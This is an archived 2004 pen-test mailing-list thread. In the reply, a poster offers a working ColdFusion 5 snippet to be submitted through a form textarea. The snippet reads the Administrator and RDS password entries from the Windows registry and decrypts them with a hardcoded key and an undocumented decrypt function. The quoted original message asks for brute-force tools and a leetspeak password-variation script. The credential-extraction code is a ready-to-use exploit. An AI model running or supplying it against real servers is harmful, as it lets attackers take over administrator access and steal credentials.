From: Tom (tommy@providesecurity.com)
Date: Fri May 21 2004 - 10:53:30 EDT
What do you mean Crack Cold Fusion?
Crack the Administrator?
If you're Running Cold Fusion 5 on windows...
Submit this into a TEXTAREA on a form
<CFSET PASSWORD_KEY = "4p0L@r1$">
<!--- Where Your Passwords are stored In Registry --->
<cfregistry action="GET"
branch="HKEY_LOCAL_MACHINE\SOFTWARE\Allaire\ColdFusion\CurrentVersion\Server
"
entry="AdminPassword" variable="adminpassword"
type="String">
<cfregistry action="GET"
branch="HKEY_LOCAL_MACHINE\SOFTWARE\Allaire\ColdFusion\CurrentVersion\Server
"
entry="StudioPassword" variable="studiopassword"
type="String">
<!--- Output Passwords To Screen using an undocumented "cfusion_Decrypt"
Function --->
<cfoutput><b>Admin Password:</b>
#evaluate("cfusion_Decrypt(adminpassword, PASSWORD_KEY )")#</cfoutput><br>
<cfoutput><b>RDS Password:</b>
#evaluate("cfusion_Decrypt(studiopassword, PASSWORD_KEY )")#</cfoutput><br>
This will decrypt the ColdFusion Administrator and RDS passwords.
It ONLY works with Cold Fusion 5. I am currently looking for a similar work
around on Cold Fusion MX.
Good Luck!
Tom Ryan
-----Original Message-----
From: don.williams@verizonwireless.com
[mailto:don.williams@verizonwireless.com]
Sent: Thursday, May 20, 2004 19:34
To: pen-test@securityfocus.com
Subject: brute force tools
Frequently I attempt to brute force web applications and have found a few
problems with the programs I have used. For instance Brutus always informs
me a few successful attempts yet when I try they fail. (2) Webcrack not
reliable.
What I would like is some other tools you may have used with good success
and hopefully a perl based script which enumerate common words substituting
letters for numbers as users do everyday (ie. pa$$w0rd). Also attempting the
crack ColdFusion it only requests the password not the user name / password
combo as most tools only allow. Windows or Linux is fine.
Thx
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:54 EDT